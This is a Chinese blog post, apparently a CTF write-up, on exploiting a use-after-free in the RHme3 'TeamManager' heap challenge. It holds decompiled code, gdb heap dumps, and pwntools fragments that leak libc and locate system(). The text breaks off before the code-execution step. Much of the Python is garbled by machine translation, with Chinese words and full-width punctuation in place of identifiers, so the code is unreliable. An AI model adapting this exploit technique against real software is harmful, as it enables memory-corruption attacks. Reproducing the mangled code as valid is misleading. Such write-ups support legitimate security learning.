<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang>
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn,">





  <link rel="alternate" href="/atom.xml" title="xfgg" type="application/atom+xml">






<meta name="description" content="RHme3 CTF 的一道题 0x01 寻找漏洞12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929">
<meta name="keywords" content="pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="uaf实例">
<meta property="og:url" content="http://yoursite.com/2019/08/08/uaf实例/index.html">
<meta property="og:site_name" content="xfgg">
<meta property="og:description" content="RHme3 CTF 的一道题 0x01 寻找漏洞12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-08-08T08:58:07.565Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="uaf实例">
<meta name="twitter:description" content="RHme3 CTF 的一道题 0x01 寻找漏洞12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485868788899091929">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2019/08/08/uaf实例/">





  <title>uaf实例 | xfgg</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">xfgg</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2019/08/08/uaf实例/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="xfgg">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="xfgg">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">uaf实例</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-08-08T16:01:52+08:00">
                2019-08-08
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/百度学习/" itemprop="url" rel="index">
                    <span itemprop="name">百度学习</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>RHme3 CTF 的一道题</p>
<h3 id="0x01-寻找漏洞"><a href="#0x01-寻找漏洞" class="headerlink" title="0x01 寻找漏洞"></a>0x01 寻找漏洞</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br></pre></td><td class="code"><pre><span class="line">RELRO           STACK CANARY      NX            PIE         </span><br><span class="line">Partial RELRO   Canary found      NX enabled    No PIE</span><br><span class="line"></span><br><span class="line">堆的题目基本都是选择菜单，这里可以添加，删除，选择，编辑，展示球员，还可以显示队伍，</span><br><span class="line"></span><br><span class="line">Welcome to your TeamManager (TM)!</span><br><span class="line">0.- Exit</span><br><span class="line">1.- Add player</span><br><span class="line">2.- Remove player</span><br><span class="line">3.- Select player</span><br><span class="line">4.- Edit player</span><br><span class="line">5.- Show player</span><br><span class="line">6.- Show team</span><br><span class="line">Your choice:</span><br><span class="line"></span><br><span class="line">Your choice: 1</span><br><span class="line">Found free slot: 0</span><br><span class="line">Enter player name: 1</span><br><span class="line">Enter attack points: 1</span><br><span class="line">Enter defense points: 1</span><br><span class="line">Enter speed: 1</span><br><span class="line">Enter precision: 1</span><br><span class="line">上面就是球员这个结构有什么信息，第一个free slot就相当于球员的id，这个不用我们输入</span><br><span class="line"></span><br><span class="line">remove就删除咯</span><br><span class="line"></span><br><span class="line">Your choice: 2</span><br><span class="line">Enter index: 0</span><br><span class="line">She<span class="string">'s gone!</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">select会输出球员的信息</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Your choice: 3</span></span><br><span class="line"><span class="string">Enter index: 0</span></span><br><span class="line"><span class="string">Player selected!</span></span><br><span class="line"><span class="string">    Name: 1</span></span><br><span class="line"><span class="string">    A/D/S/P: 1,1,1,1</span></span><br><span class="line"><span class="string">edit当前的palyer，基于上面的select</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Your choice: 4</span></span><br><span class="line"><span class="string">0.- Go back</span></span><br><span class="line"><span class="string">1.- Edit name</span></span><br><span class="line"><span class="string">2.- Set attack points</span></span><br><span class="line"><span class="string">3.- Set defense points</span></span><br><span class="line"><span class="string">4.- Set speed</span></span><br><span class="line"><span class="string">5.- Set precision</span></span><br><span class="line"><span class="string">Your choice:</span></span><br><span class="line"><span class="string">show palyer，这个显示的是select的player</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Your choice: 5</span></span><br><span class="line"><span class="string">    Name: 2</span></span><br><span class="line"><span class="string">    A/D/S/P: 1,1,1,1</span></span><br><span class="line"><span class="string">show team会将所有球员信息打印出来</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Your choice: 6</span></span><br><span class="line"><span class="string">Your team: </span></span><br><span class="line"><span class="string">Player 0</span></span><br><span class="line"><span class="string">    Name: 2</span></span><br><span class="line"><span class="string">    A/D/S/P: 1,1,1,1</span></span><br><span class="line"><span class="string">Player 1</span></span><br><span class="line"><span class="string">    Name: 3</span></span><br><span class="line"><span class="string">    A/D/S/P: 3,3,3,3</span></span><br><span class="line"><span class="string">经过对add_player的逆向，可以推出palyer的结构</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">struct palyer&#123;</span></span><br><span class="line"><span class="string">    int attackPoint;</span></span><br><span class="line"><span class="string">    int defensePoints;</span></span><br><span class="line"><span class="string">    int speed;</span></span><br><span class="line"><span class="string">    int precision;</span></span><br><span class="line"><span class="string">    char* name;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">unsigned __int64 delete_player()</span></span><br><span class="line"><span class="string">&#123;</span></span><br><span class="line"><span class="string">  void **ptr; // ST08_8</span></span><br><span class="line"><span class="string">  unsigned int v2; // [rsp+4h] [rbp-1Ch]</span></span><br><span class="line"><span class="string">  char nptr; // [rsp+10h] [rbp-10h]</span></span><br><span class="line"><span class="string">  unsigned __int64 v4; // [rsp+18h] [rbp-8h]</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">  v4 = __readfsqword(0x28u);</span></span><br><span class="line"><span class="string">  printf("Enter index: ");</span></span><br><span class="line"><span class="string">  fflush(stdout);</span></span><br><span class="line"><span class="string">  readline(&amp;nptr, 4LL);</span></span><br><span class="line"><span class="string">  v2 = atoi(&amp;nptr);</span></span><br><span class="line"><span class="string">  if ( v2 &lt;= 0xA &amp;&amp; players[v2] )</span></span><br><span class="line"><span class="string">  &#123;</span></span><br><span class="line"><span class="string">    ptr = (void **)players[v2];</span></span><br><span class="line"><span class="string">    players[v2] = 0LL;</span></span><br><span class="line"><span class="string">    free(ptr[2]);</span></span><br><span class="line"><span class="string">    free(ptr);</span></span><br><span class="line"><span class="string">    puts("She'</span>s gone!<span class="string">");</span></span><br><span class="line"><span class="string">    fflush(stdout);</span></span><br><span class="line"><span class="string">  &#125;</span></span><br><span class="line"><span class="string">  else</span></span><br><span class="line"><span class="string">  &#123;</span></span><br><span class="line"><span class="string">    puts("</span>Invalid index<span class="string">");</span></span><br><span class="line"><span class="string">    fflush(stdout);</span></span><br><span class="line"><span class="string">  &#125;</span></span><br><span class="line"><span class="string">  return __readfsqword(0x28u) ^ v4;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">uaf漏洞点</span></span><br></pre></td></tr></table></figure>

<h3 id="0x02-思路分析"><a href="#0x02-思路分析" class="headerlink" title="0x02 思路分析"></a>0x02 思路分析</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br></pre></td><td class="code"><pre><span class="line">def  alloc（name，attack  =  1， </span><br><span class="line">		   defense  =  2，speed  =  3，precision  =  4）：</span><br><span class="line"></span><br><span class="line">	p.recvuntil（<span class="string">' choice：'</span>）</span><br><span class="line">	p.sendline（<span class="string">' 1 '</span>）</span><br><span class="line"></span><br><span class="line">	p.recvuntil（<span class="string">' name：'</span>）</span><br><span class="line">	p.sendline（名称）</span><br><span class="line"></span><br><span class="line">	p.recvuntil（<span class="string">' points：'</span>）</span><br><span class="line">	p.sendline（str（attack））</span><br><span class="line"></span><br><span class="line">	p.recvuntil（<span class="string">' points：'</span>）</span><br><span class="line">	p.sendline（str（辩护））</span><br><span class="line"></span><br><span class="line">	p.recvuntil（<span class="string">' speed：'</span>）</span><br><span class="line">	p.sendline（str（speed））</span><br><span class="line"></span><br><span class="line">	p.recvuntil（<span class="string">' precision：'</span>）</span><br><span class="line">	p.sendline（str（precision））</span><br><span class="line"></span><br><span class="line">	返回</span><br><span class="line"></span><br><span class="line">def  pwn（）：</span><br><span class="line"></span><br><span class="line">    alloc（<span class="string">' A '</span> * 0x 60）</span><br><span class="line">查看栈的情况</span><br><span class="line">(gdb) x/80gx 0x604000</span><br><span class="line">      0x604000:	0x0000000000000000	0x0000000000000021 &lt;-- player 0 </span><br><span class="line">      0x604010:	0x0000000200000001	0x0000000400000003</span><br><span class="line">      0x604020:	0x0000000000604030	0x0000000000000071</span><br><span class="line">      0x604030:	0x4141414141414141	0x4141414141414141</span><br><span class="line">      0x604040:	0x4141414141414141	0x4141414141414141</span><br><span class="line">      0x604050:	0x4141414141414141	0x4141414141414141</span><br><span class="line">      0x604060:	0x4141414141414141	0x4141414141414141</span><br><span class="line">      0x604070:	0x4141414141414141	0x4141414141414141</span><br><span class="line">      0x604080:	0x4141414141414141	0x4141414141414141</span><br><span class="line">      0x604090:	0x0000000000000000	0x0000000000020f71</span><br><span class="line"></span><br><span class="line">alloc（<span class="string">' B '</span> * 0x 60）</span><br><span class="line"></span><br><span class="line">(gdb) x/80gx 0x604000</span><br><span class="line">0x604000:	0x0000000000000000	0x0000000000000021  &lt;-- player 0</span><br><span class="line">0x604010:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x604020:	0x0000000000604030	0x0000000000000071</span><br><span class="line">0x604030:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604040:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604050:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604060:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604070:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604080:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604090:	0x0000000000000000	0x0000000000000021 &lt;-- player 1</span><br><span class="line">0x6040a0:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x6040b0:	0x00000000006040c0	0x0000000000000071</span><br><span class="line">0x6040c0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040d0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040e0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040f0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604100:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604110:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604120:	0x0000000000000000	0x0000000000020ee1</span><br><span class="line"></span><br><span class="line">alloc（<span class="string">' C '</span> * 0x 80）</span><br><span class="line">alloc（<span class="string">' D '</span> * 0x 80）</span><br><span class="line"></span><br><span class="line">(gdb) x/90gx 0x604000</span><br><span class="line">0x604000:	0x0000000000000000	0x0000000000000021 &lt;-- player 0</span><br><span class="line">0x604010:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x604020:	0x0000000000604030	0x0000000000000071</span><br><span class="line">0x604030:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604040:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604050:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604060:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604070:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604080:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604090:	0x0000000000000000	0x0000000000000021 &lt;-- player 1</span><br><span class="line">0x6040a0:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x6040b0:	0x00000000006040c0	0x0000000000000071</span><br><span class="line">0x6040c0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040d0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040e0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040f0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604100:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604110:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604120:	0x0000000000000000	0x0000000000000021 &lt;-- player 2</span><br><span class="line">0x604130:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x604140:	0x0000000000604150	0x0000000000000091</span><br><span class="line">0x604150:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604160:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604170:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604180:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604190:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041a0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041b0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041c0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041d0:	0x0000000000000000	0x0000000000000021 &lt;-- player 3</span><br><span class="line">0x6041e0:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x6041f0:	0x0000000000604200	0x0000000000000091</span><br><span class="line">0x604200:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604210:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604220:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604230:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604240:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604250:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604260:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604270:	0x4444444444444444	0x4444444444444444</span><br><span class="line">0x604280:	0x0000000000000000	0x0000000000020d81</span><br><span class="line"></span><br><span class="line">select(2)</span><br><span class="line">free(2)</span><br><span class="line"></span><br><span class="line">(gdb) x/80gx 0x604000</span><br><span class="line">0x604000:	0x0000000000000000	0x0000000000000021 &lt;-- player 0 [<span class="keyword">in</span> use]</span><br><span class="line">0x604010:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x604020:	0x0000000000604030	0x0000000000000071</span><br><span class="line">0x604030:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604040:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604050:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604060:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604070:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604080:	0x4141414141414141	0x4141414141414141</span><br><span class="line">0x604090:	0x0000000000000000	0x0000000000000021 &lt;-- player 1 [<span class="keyword">in</span> use]</span><br><span class="line">0x6040a0:	0x0000000200000001	0x0000000400000003</span><br><span class="line">0x6040b0:	0x00000000006040c0	0x0000000000000071</span><br><span class="line">0x6040c0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040d0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040e0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x6040f0:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604100:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604110:	0x4242424242424242	0x4242424242424242</span><br><span class="line">0x604120:	0x0000000000000000	0x0000000000000021 &lt;-- player 2 [free]</span><br><span class="line">0x604130:	0x0000000000000000	0x0000000400000003</span><br><span class="line">0x604140:	0x0000000000604150	0x0000000000000091</span><br><span class="line">0x604150:	0x00007ffff7dd37b8	0x00007ffff7dd37b8 </span><br><span class="line">0x604160:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604170:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604180:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x604190:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041a0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041b0:	0x4343434343434343	0x4343434343434343</span><br><span class="line">0x6041c0:	0x4343434343434343	0x4343434343434343</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">然后 libc的泄露</span><br><span class="line"></span><br><span class="line"><span class="comment"># 'selected'数组包含第3个玩家对象</span></span><br><span class="line">＃我们滥用UAF vuln泄漏libc </span><br><span class="line">＃ show_player只检查<span class="string">'selected'</span>数组是否为空</span><br><span class="line">＃如果不是，它将打印玩家对象的值</span><br><span class="line">＃而不检查如果它实际上是免费的</span><br><span class="line"></span><br><span class="line">show()</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">'Name: '</span>)</span><br><span class="line"></span><br><span class="line">leak        = u64(p.recv(6).ljust(8, <span class="string">'\x00'</span>))</span><br><span class="line">libc        = leak - 0x3c17b8</span><br><span class="line">system      = libc + 0x46590</span><br><span class="line"></span><br><span class="line">log.info(<span class="string">"Leak:   0x&#123;:x&#125;"</span>.format(leak))</span><br><span class="line">log.info(<span class="string">"Libc:   0x&#123;:x&#125;"</span>.format(libc))</span><br><span class="line">log.info(<span class="string">"system: 0x&#123;:x&#125;"</span>.format(system))</span><br><span class="line"></span><br><span class="line">[*] Leak:   0x7ffff7dd37b8</span><br><span class="line">[*] Libc:   0x7ffff7a12000</span><br><span class="line">[*] system: 0x7ffff7a58590</span><br><span class="line"></span><br><span class="line">接下来就要获得任意代码执行</span><br><span class="line"></span><br><span class="line">free(3) <span class="comment">## free掉top chunk前一个</span></span><br><span class="line"></span><br><span class="line">0x604120:	0x0000000000000000	0x00000000000000b1 &lt;-- player 2 [free]</span><br><span class="line">0x604130:	0x00007ffff7dd37b8	0x00007ffff7dd37b8</span><br><span class="line">0x604140:	0x0000000000604150	0x0000000000000091</span><br><span class="line">0x604150:	0x00007ffff7dd37b8	0x00007ffff7dd37b8</span><br><span 